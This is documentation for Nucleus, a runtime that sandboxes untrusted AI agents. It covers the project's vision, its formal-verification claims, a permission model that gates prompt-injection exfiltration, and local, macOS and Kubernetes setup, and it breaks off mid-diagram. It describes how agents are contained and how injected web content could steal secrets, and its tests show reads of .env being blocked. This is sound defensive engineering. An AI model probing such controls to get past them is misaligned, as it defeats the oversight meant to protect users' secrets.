Nucleus Documentation

Nucleus is a capability-based runtime for running untrusted agents with explicit policy and hardened execution paths.

Use the sections below to explore the architecture, threat model, and integration notes.

Nucleus North Star

Vision

Nucleus makes “agent jailbreak → silent damage” provably impossible by construction, while remaining frictionless enough that small dev teams adopt it like a linter.

Assume the agent is compromised. Constrain what it can do anyway. Prove the constraints hold.

Flagship Safety Claim

No external side effect occurs unless it is mediated by Nucleus and authorized by a policy that can only stay the same or tighten during execution.

Corollaries:

No exfiltration without an explicit sink capability.
No “talk your way into more permissions” mid-run.
No untrusted content reaching a sink without an approval/declassification gate.

This is the apodictic core — logically compelled, machine-checkable, marketable.

This claim rests on the capability safety theorem: in an object-capability (ocap) system, authority propagates only through explicit capability references. If the enforcement boundary is capability-safe, no code inside it can acquire authority it was not granted. This connects Nucleus to a 40-year lineage (E language, KeyKOS, seL4, Capsicum) and is the formal basis for “prove the boundary, not the model.”

Three Pillars

Pillar A — Math That Survives (Kernel Semantics)

The math core is small and sharp:

Capability lattice (authority) — 12-dimensional product lattice with 3-level capability states (Never/LowRisk/Always). Compare, combine, restrict permissions algebraically.
Exposure lattice (trust) — 3-bool semilattice tracking private_data, untrusted_content, and exfil_vector. When all three co-occur (uninhabitable state), the operation requires explicit approval. Exposure is monotone: it never decreases.
Trace semantics (time) — ordered record of actions, authority, and exposure at each step. Free monoid with homomorphic exposure accumulation.
Monotonicity (ratchet) — authority can only stay the same or tighten. Budget can only decrease. Exposure can only increase. The nucleus operator ν is idempotent and deflationary.

Key design choice: prove properties about the enforcement boundary, not about LLM behavior. The agent is a black box. The kernel is the TCB.

Current state: 113 Kani harnesses + ~277 Lean 4 theorems verify the security core in CI, covering lattice laws, uninhabitable state operator, Heyting algebra, modal operators (S4), exposure monoid, graded monad laws, Galois connections, fail-closed auth boundary, capability coverage theorem, budget monotonicity, and delegation ceiling theorem. (Verus was evaluated and removed; verification consolidated on Lean 4 + Kani — see the README verification table.) Phase 0-2 partially complete.

Pillar B — Formal Methods as a Product Feature

Proofs are first-class artifacts, not academic exercises:

Kani bounded model checking — 113 machine-checked harnesses over the Rust kernel’s decision logic; complete over the finite lattice state space. CI-gated via kani-nightly.yml.
Lean 4 model — ~277 kernel-checked theorems for the security core (capability Heyting algebra, IFC semilattice, taint monotonicity, exposure monoid, delegation); the Aeneas pipeline mechanically translates the core capability types from Rust to Lean so proofs run over generated code. CI-gated via lean-build.yml / aeneas-ifc-scoped.yml.
Differential testing (planned) — Cedar pattern: millions of random inputs compared between Rust engine and Lean model.
Public Verified Claims page — each claim maps to a proof artifact and code commit.
Continuous verification gates — CI fails if a change violates a proven invariant. No regression path.

Pillar C — Dead-Simple Developer Usability

A developer can get value in under 10 minutes. No lattice theory required.

Install with pip (Python SDK) or cargo (Rust SDK)
Run nucleus audit for immediate CI integration
Wrap a workflow in a “safe session” with 10 lines of code
Choose from built-in profiles, never think about lattices

Product Surface

One mental model across all entry points, with value at every tier:

Tier 0: `nucleus audit`

Fast value, no runtime required:

Scan repo settings, MCP configs, agent configurations
Emit PR comments / SARIF
Generate a minimal safe profile + allowlist snippet
PLG funnel entry: teams adopt this before committing to a runtime

Tier 0.5: `nucleus observe`

Bridge from “I don’t know what my agent does” to “here’s a tight profile”:

Run alongside an existing agent, record all tool calls and side effects
Suggest a minimal capability lattice policy based on observed behavior
Output is formal (a lattice policy), not statistical (a behavioral baseline)
Differentiator from ARMO: prescriptive output, not behavioral baseline

Tier 1: `nucleus run --local`

Immediate felt safety:

All side effects go through a local proxy
No direct agent access except via the mediated gateway
Approval prompts for risky actions (uninhabitable state triggers)
Same policy language as Tier 2

Tier 2: `nucleus run --vm`

Hard containment:

Firecracker microVM boundary (Firecracker-based isolation)
Default-deny egress, allowlisted DNS/hosts
gRPC tool proxy inside the VM, SPIFFE workload identity
Same policy language, same traces, same proofs
Target: <500ms cold start via pre-warmed VM pools

Dev usability does not wait for Tier 2. But Tier 2 is the “serious people” finish line.

MCP Mediation (cross-tier)

MCP is the de facto agent-tool protocol. Nucleus is an MCP-aware mediator:

Interposes on MCP tool calls, applies capability checks, records traces
nucleus run accepts MCP server configs and proxies them through the policy engine
Any MCP client gets enforcement for free — no SDK adoption required
Current state: nucleus-mcp crate provides Claude Code ↔ tool-proxy bridging. Extend to general MCP mediation.

The Python SDK

The “Hello World” experience should feel like requests + pathlib, not like configuring SELinux.

SDK Principles

A developer should never need to think about lattices
Unsafe actions are impossible to express without explicit approval steps
Audit traces are produced automatically
Intent-based API maps to built-in profiles

Example

from nucleus import Session, approve
from nucleus.tools import fs, net, git

with Session(profile="safe_pr_fixer") as s:
    readme = fs.read("README.md")           # ok
    fs.write("README.md", readme + "\n")    # ok (scoped)

    # risky: outbound fetch — explicit gate
    page = approve("fetch", net.fetch, "https://example.com")

    # forbidden: publish
    git.push("origin", "main")              # raises PolicyDenied

SDK Ships With

Profiles: safe_pr_fixer, doc_editor, test_runner, triage_bot, code_review, codegen, release, research_web, read_only, local_dev
Typed handles: FileHandle, NetResponse, CommandOutput that carry exposure metadata
Exceptions: PolicyDenied, ApprovalRequired, BudgetExceeded, StateBlocked
Trace export: session.trace.export_jsonl()

Current state (March 2026): Draft Python SDK at sdk/python/ with intent-first API, mTLS/SPIFFE auth, and tool wrappers for fs/git/net. Functional for direct tool-proxy connections.

The Kernel Boundary

The agent process must not have ambient authority.

No direct egress. No direct filesystem beyond what is mediated. No token leaks.

The kernel is the only place where:

Decisions are made (capability check)
Approvals are validated (uninhabitable state gate)
Traces are recorded (audit log)
Exposure is tracked (monotone accumulation)

This is what makes formal verification tractable: the TCB is small (~10-15K LOC of verified Rust), and every path through it either enforces the lattice or panics. No fail-open. No silent degradation.

┌─────────────────────────────────────────────────────┐
│  Verified Core (Lean 4 + Kani)      ~10-15K LOC     │
│  ├── portcullis lattice engine     113 Kani proofs  │
│  ├── exposure guard + uninhabitable state        proven monotone  │
│  ├── permission enforcement        fail-closed      │
│  └── sandbox boundary              proven panics    │
├─────────────────────────────────────────────────────┤
│  Formal Model (Lean 4, hand-written) partial         │
│  ├── CapabilityLevel HeytingAlgebra Lean 4 proofs   │
│  ├── Aeneas pipeline (core types)  in progress      │
│  └── graded monad laws             planned          │
├─────────────────────────────────────────────────────┤
│  Differential Testing              planned          │
│  ├── Rust engine vs Lean model     cargo fuzz       │
│  └── Lean/Kani proof ratchet       CI-gated         │
├─────────────────────────────────────────────────────┤
│  Runtime (standard Rust)           ~70K LOC         │
│  ├── gRPC, tokio, tonic            Kani checks      │
│  ├── Firecracker + SPIFFE          integration      │
│  └── Tool proxy, audit, MCP        proptest         │
└─────────────────────────────────────────────────────┘

Competitive Positioning

                    Formal Guarantees
                         ▲
                         │
                         │  ★ Nucleus (target)
                         │
    Papers ●             │
    (no product)         │
                         │
         AgentSpec ●     │
                         │
    ─────────────────────┼──────────────────► Dev Usability
                         │
              ARMO ●     │         E2B ●
                         │     Daytona ●
              CodeGate ● │  microsandbox ●
                         │

Why Not X?

Alternative	What it does	What it lacks
E2B / Daytona / microsandbox	Run code in Firecracker/Docker	No policy, no capability model, no exposure, no proofs. Ambient authority inside the box.
AgentSpec (ICSE 2026)	DSL for runtime rule enforcement	Ad-hoc rules, not lattice-based. No monotonicity guarantee. Rules are LLM-generated (95% precision — 5% are wrong).
ARMO	eBPF observe → baseline → enforce	Behavioral, not prescriptive. Must allow bad behavior before blocking it. No formal guarantees.
Google Agent Sandbox (GKE)	Pre-warmed VM pools, fast launch	Infrastructure-level only. No policy language, no exposure, no proofs.
CodeGate	Firecracker + locked pip installs	Single-purpose (supply chain). No general policy engine.

Nucleus’s five differentiators:

Capability lattice with monotonicity proof — authority is a mathematical ratchet, not a config file.
Exposure tracking with uninhabitable state gate — information flow control that blocks exfiltration by construction.
“Prove the boundary, not the model” — verify the enforcement kernel (tractable, seL4-style), not LLM behavior (impossible).
Tiered value delivery — nucleus audit gives value before any runtime commitment. Audit-first PLG funnel.
Vendor-agnostic by design — self-hosted runtime any orchestrator can target. No cloud lock-in.

What to Learn From the Field

E2B’s SDK ergonomics — pip install + 3 lines = sandbox. Match this simplicity.
ARMO’s progressive enforcement — the observe → baseline → enforce UX is excellent for teams that don’t know what policy to write. nucleus observe adopts this pattern but outputs formal policies, not behavioral baselines.
microsandbox’s MCP integration — MCP-native runtime is table-stakes. Nucleus must be an MCP-aware mediator.
AgentSpec’s DSL readability — trigger/predicate/action patterns are ergonomic. Policy authoring should be at least as readable.
Google’s pre-warmed pools — sub-second cold start is an infrastructure requirement for Tier 2.

Formal Methods Ladder

Each rung is shippable independently.

Rung 1 — Kani + Lean Proofs (in progress)

113 Kani harnesses + ~277 Lean theorems verified in CI (minimum gate)
Covers: lattice laws, uninhabitable state operator, Heyting algebra, S4 modal operators, exposure monoid, graded monad laws, Galois connections, fail-closed auth, capability coverage, budget monotonicity, delegation ceiling
Key finding from proofs: nucleus operator ν is NOT monotone (proven counterexample — uninhabitable state fires for y but not x). This was discovered by the proofs, not by tests. The proofs are working.

Rung 2 — Lean 4 Model (partial)

Done: hand-written kernel-checked proof of CapabilityLevel as a HeytingAlgebra (Mathlib-linked, 27-case decide). Discriminant correspondence enforced by lean_tonat_matches_rust_discriminants CI test. Kani R1/R2/R3 harnesses bridge the Lean proofs to bounded model checking.
Planned: Aeneas/Charon pipeline translation (Rust MIR → LLBC → Lean) for the full portcullis crate; Mathlib links for broader algebraic structures; graded monad laws in Lean 4.

Rung 3 — Differential Testing (planned, Phase 3)

Cedar pattern: Rust engine vs Lean model on millions of random inputs
Catches: serialization boundaries, encoding issues, discrepancies between verified model and production code
CI-gated: every PR checked against the formal model

Rung 4 — Extended TCB Verification (planned, Phase 4)

Sandbox boundary, credential handling, tool proxy
Kani bounded model checking for arithmetic paths
Goal: full TCB machine-checked end to end

Rung 5 — TCB Minimization

The moonshot is not “prove all the code.” The moonshot is: make the proven kernel tiny enough that proving it is realistic. This is how seL4 thinking wins: reduce the surface you must trust.

Supply Chain Integrity (Exposure Tracking Use Case)

The exposure lattice has a concrete day-one demo: supply chain safety.

Package installs from untrusted registries carry untrusted_content exposure
Exposed dependencies cannot reach sinks (network, filesystem writes) without explicit approval
Combined with exfil_vector exposure on git push / network egress, the uninhabitable state gate blocks dependency-confusion attacks by construction
This is what CodeGate does with a bespoke tool. Nucleus does it as a natural consequence of the exposure lattice.

Success Criteria

Dev Adoption

A team gets value in < 10 minutes
pip install nucleus + nucleus audit produces:
- a clear pass/fail in CI
- a minimal safe profile suggestion
- an MCP allowlist snippet
nucleus observe generates a first-pass policy from 30 minutes of agent observation

Security

“No direct agent calls except via proxy” is enforceable and demonstrable
Traces are replayable and tamper-evident enough for incident review
A red-team attempt produces a PolicyDenied or an approval request — not a leak

Formal Methods

Public “Verified Claims” matrix:
- Claim → Proof artifact → Code hash
CI fails if a change violates the proven model
Proof count (Kani harnesses + Lean theorems) is monotonically non-decreasing (ratchet)

Performance

Tier 2 cold start: <500ms with pre-warmed pools
Policy evaluation overhead: <1ms per decision
Exposure tracking overhead: negligible (3-bool join)

Iteration Plan

PR-sized increments that ship value while converging on the moonshot:

PR	Scope	Ships
PR0	North Star + Verified Claims doc	This document, claims table, threat model
PR1	Python SDK skeleton	`Session`, exceptions, trace export, local proxy wiring
PR2	Policy schema + canonical profiles	Tiny stable policy surface, “break the uninhabitable state” defaults
PR3	Minimal kernel decision engine	Complete mediation for file/net/exec/publish, monotone session state
PR4	Exposure plumbing	Exposure on handles, exposed-to-sink gating + approval
PR5	Executable spec + model checking	Lock semantics early, prevent drift
PR6	Proofs of the core invariants	Monotonicity + source-sink safety
PR7	`nucleus observe`	Progressive discovery mode, formal policy output
PR8	MCP mediation layer	General MCP interposition, not just Claude Code bridging
PR9	VM mode hardening	Shrink ambient authority further, pre-warmed pools, <500ms target
PR10	Attenuation tokens	Delegation that can only reduce power, “no escalation” cryptographically natural

The North Star Sentence

Nucleus is a runtime that makes it impossible for an agent to do something dangerous unless you explicitly gave it the power — and that boundary is small enough to prove.

Others sandbox the agent. Nucleus proves the sandbox holds.

Why Rust

Rust is the only language that satisfies all four requirements simultaneously:

Near-C performance — zero-cost abstractions, no GC, deterministic latency inside Firecracker microVMs
Modern type system — algebraic data types, pattern matching, traits, async/await, package ecosystem
Formal verification — Verus (SMT-based, SOSP 2025 Best Paper), Aeneas (Rust → Lean 4), Kani (bounded model checking), hax (Rust → F*)
Safety certification — Ferrocene qualified at ISO 26262 ASIL-D, IEC 61508 SIL 4, IEC 62304 Class C

Precedents

AWS Nitro Isolation Engine — formally verified Rust hypervisor (Verus + Isabelle/HOL). Deployed at AWS scale on Graviton5.
Atmosphere microkernel (SOSP 2025 Best Paper) — L4-class microkernel verified with Verus. 7.5:1 proof-to-code ratio.
AWS Cedar — formally verified authorization engine. Rust + Lean + differential testing. 1B auth/sec. Our architectural template.
libcrux — formally verified post-quantum crypto in Rust via hax → F*. Shipping in Firefox.
AutoVerus (OOPSLA 2025) — LLM agents auto-generate Verus proofs. 137/150 tasks proven, >90% automation rate.

References

Local Testing Quickstart

Test Nucleus permission enforcement locally without Kubernetes or Firecracker.

Prerequisites

Rust toolchain (1.75+)
curl and jq for testing

1. Build the Tool Proxy

cargo build -p nucleus-tool-proxy --release

2. Start the Tool Proxy

./target/release/nucleus-tool-proxy \
  --spec examples/openclaw-demo/pod.yaml \
  --listen 127.0.0.1:8080 \
  --auth-secret demo-secret \
  --approval-secret approval-secret \
  --audit-log /tmp/nucleus-demo-audit.log

The demo profile includes the uninhabitable state (read + web + bash), so all bash commands require approval.

3. Test Permission Enforcement

Create a helper function for signed requests:

nucleus_call() {
  local ENDPOINT=$1
  local BODY=$2
  local TIMESTAMP=$(date +%s)
  local ACTOR="test"
  local MESSAGE="${TIMESTAMP}.${ACTOR}.${BODY}"
  local SIGNATURE=$(echo -n "${MESSAGE}" | openssl dgst -sha256 -hmac "demo-secret" | awk '{print $2}')

  curl -s -X POST "http://127.0.0.1:8080/v1/${ENDPOINT}" \
    -H "Content-Type: application/json" \
    -H "X-Nucleus-Timestamp: ${TIMESTAMP}" \
    -H "X-Nucleus-Actor: ${ACTOR}" \
    -H "X-Nucleus-Signature: ${SIGNATURE}" \
    -d "${BODY}"
}

Test Cases

Read allowed file (should succeed):

nucleus_call "read" '{"path":"README.md"}' | jq -r '.contents[:100]'
# Output: # Nucleus...

Read sensitive file (should be blocked):

nucleus_call "read" '{"path":".env"}' | jq '.error'
# Output: "nucleus error: access denied: path '.env' blocked by policy"

Run git status (requires approval due to uninhabitable state):

nucleus_call "run" '{"command":"git status"}' | jq '.'
# Output: {"error":"nucleus error: approval required...","kind":"approval_required"}

Run bash -c (blocked by command policy + uninhabitable state):

nucleus_call "run" '{"command":"bash -c \"echo hi\""}' | jq '.kind'
# Output: "approval_required"

4. Verify Audit Log

cat /tmp/nucleus-demo-audit.log | jq '{event, subject, result}'

Each entry includes:

Hash-chained integrity (prev_hash, hash)
HMAC signature (signature)
Actor tracking

Expected Results

Test	Expected	Reason
Read README.md	Success	Allowed path
Read .env	Blocked	Sensitive path pattern
git status	Approval required	Uninhabitable state active (read + web + bash)
bash -c	Approval required	Shell interpreter blocked + uninhabitable state

Why Uninhabitable state Triggers

The demo profile has:

read_files: Always (private data access)
web_fetch: LowRisk (untrusted content)
run_bash: LowRisk (exfiltration vector)

All three legs of the “uninhabitable state” are present, so Nucleus automatically requires approval for exfiltration operations (run_bash, git_push, create_pr).

This protects against prompt injection attacks that could steal secrets via web content.

Test with Network-Isolated Profile

For testing without uninhabitable state protection, use the codegen profile which has no web access:

# codegen-pod.yaml
apiVersion: nucleus/v1
kind: Pod
metadata:
  name: codegen-test
spec:
  work_dir: .
  timeout_seconds: 3600
  policy:
    type: profile
    name: codegen

./target/release/nucleus-tool-proxy \
  --spec codegen-pod.yaml \
  --listen 127.0.0.1:8080 \
  --auth-secret demo-secret \
  --approval-secret approval-secret \
  --audit-log /tmp/codegen-audit.log

With codegen, bash commands will succeed without approval (no uninhabitable state because web_fetch: Never).

Next Steps

Kubernetes Quickstart - Production deployment
Permission Profiles - All available profiles
OpenClaw Integration - Full OpenClaw adapter setup

macOS Quickstart

This guide walks you through setting up Nucleus on macOS with full Firecracker microVM isolation.

One-Line Install (Recommended)

For M3/M4 Mac with macOS 15+, get started instantly:

curl -fsSL https://raw.githubusercontent.com/coproduct-opensource/nucleus/main/scripts/install.sh | bash

This will:

Install Lima (if not present)
Download pre-built binaries and rootfs
Create a Lima VM with nested virtualization
Configure secrets in macOS Keychain
Start nucleus-node

After installation, verify with:

nucleus doctor
nucleus run "uname -a"  # Should print: Linux ... aarch64 GNU/Linux

Manual Installation

If you prefer manual setup or need to customize the installation, follow the steps below.

Prerequisites

All Macs

macOS 13+ (macOS 15+ recommended for nested virtualization)
Lima 2.0+ (brew install lima) - required for nested virtualization support
Rust toolchain (for building nucleus binaries)
cross (cargo install cross) for cross-compiling Linux binaries

Note: Docker Desktop is not required. Lima VMs include Docker, so rootfs images are built inside the VM.

Verify Lima version:

limactl --version
# Should show: limactl version 2.0.0 or higher

Intel Mac Additional Requirements

Intel Macs require QEMU for the Lima VM (Apple Virtualization.framework only supports ARM64):

# Install QEMU
brew install qemu

# Fix cross-rs toolchain issue (required for cross-compilation)
rustup toolchain install stable-x86_64-unknown-linux-gnu --force-non-host

Note: Intel Macs cannot use hardware-accelerated nested virtualization. Firecracker microVMs will run via QEMU emulation, which is slower but fully functional.

Optimal Setup (Apple Silicon M3/M4)

For the best experience with native nested virtualization:

Apple M3 or M4 chip
macOS 15 (Sequoia) or newer

This combination provides hardware-accelerated KVM inside the Lima VM, giving near-native performance for Firecracker microVMs.

Native Testing on M3/M4 (Recommended)

If you have an M3 or M4 Mac running macOS 15+, you get native Firecracker performance with full KVM acceleration.

Verify Your Setup

nucleus doctor

Look for these indicators of full native support:

Platform
--------
[OK] Operating System: macos (aarch64)
[OK] Apple Chip: M4 (nested virt supported)
[OK] macOS Version: 15.2 (nested virt supported)

Lima VM
-------
[OK] Lima installed: yes
[OK] nucleus VM: running
[OK] KVM in VM: /dev/kvm available (native Firecracker performance)
[OK] Firecracker: Firecracker v1.14.1

If you see [WARN] KVM in VM: /dev/kvm not available, you’re running in emulation mode.

Why M3/M4 Matters

Feature	M1/M2	M3/M4 + macOS 15+
Lima VM	Native (vz)	Native (vz)
/dev/kvm	Emulated	Hardware accelerated
Firecracker boot	~2-3 seconds	~100-200ms
microVM performance	Emulated	Near-native

Testing the Full Stack

# 1. Setup (creates Lima VM with nested virt)
nucleus setup

# 2. Verify KVM is available (should show "native Firecracker performance")
limactl shell nucleus -- ls -la /dev/kvm
# Should show: crw-rw-rw- 1 root kvm ...

# 3. Start nucleus
nucleus start

# 4. Run test workload
nucleus run "uname -a"
# Should show: Linux ... aarch64 GNU/Linux

# 5. Verify Firecracker process (if you have tasks running)
limactl shell nucleus -- ps aux | grep firecracker

Troubleshooting M3/M4

Issue	Cause	Solution
KVM not available	macOS < 15	Upgrade to macOS 15 (Sequoia)
KVM not available	Lima using QEMU	Delete VM and run `nucleus setup --force`
Slow microVM start	Falling back to emulation	Check `limactl info nucleus` shows `vmType: vz`
Nested virt disabled	Lima config issue	Verify `nestedVirtualization: true` in lima.yaml

Verifying Nested Virtualization

# Check Lima VM configuration
limactl info nucleus | grep -E "(vmType|nestedVirt)"
# Should show:
#   vmType: vz
#   nestedVirtualization: true

# Check KVM inside VM
limactl shell nucleus -- test -c /dev/kvm && echo "KVM OK" || echo "KVM missing"

Architecture

┌─────────────────────────────────────────────────────────────────┐
│  macOS Host                                                     │
│  ┌───────────────────────────────────────────────────────────┐ │
│  │  Lima VM (Apple Virtualization.framework)                 │ │
│  │  ┌─────────────────────────────────────────────────────┐ │ │
│  │  │  nucleus-node (orchestrator)                        │ │ │
│  │  │    ↓                                                │ │ │
│  │  │  ┌─────────────┐  ┌─────────────┐                  │ │ │
│  │  │  │ Firecracker │  │ Firecracker │  ... (microVMs)  │ │ │
│  │  │  │ ┌─────────┐ │  │ ┌─────────┐ │                  │ │ │
│  │  │  │ │guest-   │ │  │ │guest-   │ │                  │ │ │
│  │  │  │ │init →   │ │  │ │init →   │ │                  │ │ │
│  │  │  │ │tool-    │ │  │ │tool-    │ │                  │ │ │
│  │  │  │ │proxy    │ │  │ │proxy    │ │                  │ │ │
│  │  │  │ └─────────┘ │  │ └─────────┘ │                  │ │ │
│  │  │  └─────────────┘  └─────────────┘                  │ │ │
│  │  └─────────────────────────────────────────────────────┘ │ │
│  │  /dev/kvm (nested virtualization)                        │ │
│  └───────────────────────────────────────────────────────────┘ │
└─────────────────────────────────────────────────────────────────┘

Quick Start

1. Install Dependencies

# Install Lima
brew install lima

# Install cross for cross-compilation
cargo install cross

2. Setup Environment

# Run setup (creates Lima VM, secrets, config)
nucleus setup

This will:

Detect your Mac’s chip (Intel vs Apple Silicon)
Create a Lima VM with the appropriate architecture
Download Firecracker and kernel for that architecture
Generate secrets in macOS Keychain
Create configuration at ~/.config/nucleus/config.toml

3. Build Rootfs

# Cross-compile binaries for the rootfs
./scripts/cross-build.sh

# Build rootfs in Lima VM (Lima includes Docker - no Docker Desktop needed!)
limactl shell nucleus -- make rootfs

The rootfs build happens inside the Lima VM which has Docker pre-installed. Secrets are injected at runtime via kernel command line - they’re not baked into the rootfs image.

4. Install nucleus-node

# Option A: Copy cross-compiled binary
limactl cp target/aarch64-unknown-linux-musl/release/nucleus-node nucleus:/usr/local/bin/

# Option B: Build inside VM (slower)
limactl shell nucleus -- cargo build --release -p nucleus-node
limactl shell nucleus -- sudo cp target/release/nucleus-node /usr/local/bin/

5. Start Nucleus

# Start nucleus-node service
nucleus start

# Output:
# Nucleus is running!
# HTTP API: http://127.0.0.1:8080
# Metrics:  http://127.0.0.1:9080

6. Run Tasks

# Run a task with enforced permissions
nucleus run "Review the code in src/main.rs"

7. Stop Nucleus

# Stop nucleus-node (keeps VM running)
nucleus stop

# Stop nucleus-node AND the VM (saves resources)
nucleus stop --stop-vm

Platform Support

Platform	VM Type	KVM	Performance
M3/M4 + macOS 15+	vz (native)	Nested	Fast
M1/M2 + macOS 15+	vz (native)	Emulated	Medium
M1-M4 + macOS <15	vz (native)	Emulated	Medium
Intel Mac	QEMU (x86_64)	Emulated	Slow

Security Model

Nucleus provides two layers of VM isolation:

Layer 1: Lima VM

Apple Virtualization.framework (Apple Silicon) or QEMU (Intel)
Isolates the Firecracker orchestrator from macOS
Managed by Lima with port forwarding

Layer 2: Firecracker microVMs

Minimal device model (5 virtio devices)
Each task runs in its own microVM
Read-only rootfs with scratch volume

Network Security

Default-deny iptables policy
DNS allowlist for controlled outbound access
No direct internet access without explicit policy

Security Claims

Layer	Isolation	Escape Difficulty
macOS ↔ Lima	Apple vz / QEMU	VM escape (high)
Lima ↔ Firecracker	KVM + jailer	VM escape (high)
Firecracker ↔ Agent	Minimal virtio	Kernel exploit (high)
Agent ↔ Network	iptables + allowlist	Policy bypass (medium)

Troubleshooting

“KVM not available”

This warning appears when nested virtualization isn’t working. Causes:

M1/M2 Macs: Don’t support nested virt (works via emulation, slower)
macOS < 15: Upgrade to macOS Sequoia for nested virt support
Intel Macs: Use QEMU emulation (slowest)

Intel Mac: “QEMU binary not found”

Install QEMU:

brew install qemu

Intel Mac: cross-rs “toolchain may not be able to run on this system”

This error occurs when cross-compiling for Linux on Intel Mac:

error: toolchain 'stable-x86_64-unknown-linux-gnu' may not be able to run on this system

Fix by installing the toolchain with the --force-non-host flag:

rustup toolchain install stable-x86_64-unknown-linux-gnu --force-non-host

See: cross-rs/cross#1687

“Lima VM failed to start”

# Check VM status
limactl list

# View VM logs
limactl shell nucleus -- journalctl -xe

# Delete and recreate
nucleus setup --force

“nucleus-node not found”

You need to install the nucleus-node binary in the VM:

# Cross-compile for the correct architecture
./scripts/cross-build.sh --arch aarch64  # or x86_64 for Intel

# Copy to VM
limactl cp target/aarch64-unknown-linux-musl/release/nucleus-node nucleus:/usr/local/bin/

Port forwarding issues

If http://127.0.0.1:8080 doesn’t respond:

# Verify port forwarding
limactl list --format '{{.Name}} {{.Status}} {{.SSHLocalPort}}'

# Check if nucleus-node is listening
limactl shell nucleus -- ss -tlnp | grep 8080

# View nucleus-node logs
limactl shell nucleus -- journalctl -u nucleus-node -f

Commands Reference

Command	Description
`nucleus setup`	Initial setup (Lima VM, secrets, config)
`nucleus setup --force`	Recreate VM and config
`nucleus start`	Start nucleus-node service
`nucleus start --no-wait`	Start without health check
`nucleus stop`	Stop nucleus-node
`nucleus stop --stop-vm`	Stop nucleus-node AND Lima VM
`nucleus doctor`	Diagnose issues
`nucleus run "task"`	Run a task

Advanced Configuration

Custom VM Resources

nucleus setup --vm-cpus 8 --vm-memory-gib 16 --vm-disk-gib 100

Rotate Secrets

nucleus setup --rotate-secrets

Skip VM Setup (manual Lima management)

nucleus setup --skip-vm

Configuration File

Edit ~/.config/nucleus/config.toml:

[vm]
name = "nucleus"
auto_start = true
cpus = 4
memory_gib = 8

[node]
url = "http://127.0.0.1:8080"

[budget]
max_cost_usd = 5.0
max_input_tokens = 100000
max_output_tokens = 10000

Kubernetes Quickstart

Deploy Firecracker-isolated AI agent sandboxes on Kubernetes with fine-grained permission control.

Why Nucleus on Kubernetes?

Feature	Google Agent Sandbox	Nucleus
Isolation	gVisor (syscall filter)	Firecracker (hardware VM)
Attack surface	~300 syscalls exposed	~50K lines Rust, KVM-backed
Permission model	Pod RBAC only	Lattice-guard with uninhabitable state detection
Startup time	<1s (warm pool)	<125ms (Firecracker)
Memory overhead	~50MB	~5MB per microVM

Nucleus provides hardware-level isolation with a mathematical permission model that automatically detects dangerous capability combinations (the “uninhabitable state”).

Prerequisites

Kubernetes cluster with Linux nodes (kernel 5.10+)
Nodes with /dev/kvm access (nested virt or bare metal)
kubectl configured

Architecture

┌─────────────────────────────────────────────────────────────┐
│                    Kubernetes Cluster                        │
├─────────────────────────────────────────────────────────────┤
│  ┌─────────────────┐  ┌─────────────────┐                   │
│  │  nucleus-node   │  │  nucleus-node   │  (DaemonSet)      │
│  │  ┌───────────┐  │  │  ┌───────────┐  │                   │
│  │  │Firecracker│  │  │  │Firecracker│  │                   │
│  │  │  microVM  │  │  │  │  microVM  │  │                   │
│  │  │┌─────────┐│  │  │  │┌─────────┐│  │                   │
│  │  ││tool-    ││  │  │  ││tool-    ││  │                   │
│  │  ││proxy    ││  │  │  ││proxy    ││  │                   │
│  │  │└─────────┘│  │  │  │└─────────┘│  │                   │
│  │  └───────────┘  │  │  └───────────┘  │                   │
│  └─────────────────┘  └─────────────────┘                   │
│           │                    │                             │
│           └────────┬───────────┘                             │
│                    ▼                                         │
│  ┌─────────────────────────────────────┐                    │
│  │         nucleus-controller          │  (Deployment)      │
│  │  - Watches NucleusSandbox CRDs      │                    │
│  │  - Schedules pods to nodes          │                    │
│  │  - Enforces permission lattice      │                    │
│  └─────────────────────────────────────┘                    │
└─────────────────────────────────────────────────────────────┘

Quick Deploy

1. Create Namespace

kubectl create namespace nucleus-system

2. Deploy nucleus-node DaemonSet

# nucleus-node-daemonset.yaml
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: nucleus-node
  namespace: nucleus-system
spec:
  selector:
    matchLabels:
      app: nucleus-node
  template:
    metadata:
      labels:
        app: nucleus-node
    spec:
      hostPID: true
      hostNetwork: true
      containers:
      - name: nucleus-node
        image: ghcr.io/coproduct-opensource/nucleus-node:latest
        securityContext:
          privileged: true  # Required for Firecracker + KVM
        env:
        - name: NUCLEUS_NODE_LISTEN
          value: "0.0.0.0:8080"
        - name: NUCLEUS_NODE_DRIVER
          value: "firecracker"
        - name: NUCLEUS_NODE_FIRECRACKER_NETNS
          value: "true"
        volumeMounts:
        - name: dev-kvm
          mountPath: /dev/kvm
        - name: pods
          mountPath: /var/lib/nucleus/pods
        ports:
        - containerPort: 8080
          hostPort: 8080
      volumes:
      - name: dev-kvm
        hostPath:
          path: /dev/kvm
      - name: pods
        hostPath:
          path: /var/lib/nucleus/pods
          type: DirectoryOrCreate
      nodeSelector:
        nucleus.io/kvm: "true"

# Label nodes with KVM support
kubectl label nodes <node-name> nucleus.io/kvm=true

# Deploy
kubectl apply -f nucleus-node-daemonset.yaml

3. Create a Sandbox

# sandbox.yaml
apiVersion: v1
kind: ConfigMap
metadata:
  name: agent-sandbox-spec
  namespace: nucleus-system
data:
  pod.yaml: |
    apiVersion: nucleus.io/v1
    kind: PodSpec
    metadata:
      name: code-review-agent
    spec:
      profile: code-review
      work_dir: /workspace
      timeout_seconds: 3600

      # Permission overrides
      capabilities:
        read_files: always
        write_files: never
        edit_files: never
        run_bash: never
        web_search: low_risk
        web_fetch: never
        git_commit: never
        git_push: never
        create_pr: never

      # Network policy
      network:
        dns_allow:
          - "api.anthropic.com:443"
          - "api.openai.com:443"

4. Launch Agent via API

# Port-forward to nucleus-node
kubectl port-forward -n nucleus-system daemonset/nucleus-node 8080:8080 &

# Create sandbox
curl -X POST http://localhost:8080/v1/pods \
  -H "Content-Type: application/yaml" \
  -d @sandbox.yaml

Permission Profiles

Nucleus includes built-in profiles for common agent patterns:

Profile	Use Case	Capabilities
`read-only`	Code exploration	Read files, no writes/network
`code-review`	PR review agents	Read + web search for context
`fix-issue`	Bug fix agents	Full dev workflow, uninhabitable state protected
`demo`	Live demos	Blocks shell interpreters

Uninhabitable state Protection

When an agent has all three dangerous capabilities:

Private data access (read_files ≥ low_risk)
Untrusted content (web_fetch OR web_search ≥ low_risk)
Exfiltration channel (git_push OR create_pr OR run_bash ≥ low_risk)

Nucleus automatically requires human approval for exfiltration actions. This protects against prompt injection attacks that could steal secrets.

Agent requests: git push origin main
┌─────────────────────────────────────────┐
│  ⚠️  uninhabitable state PROTECTION TRIGGERED      │
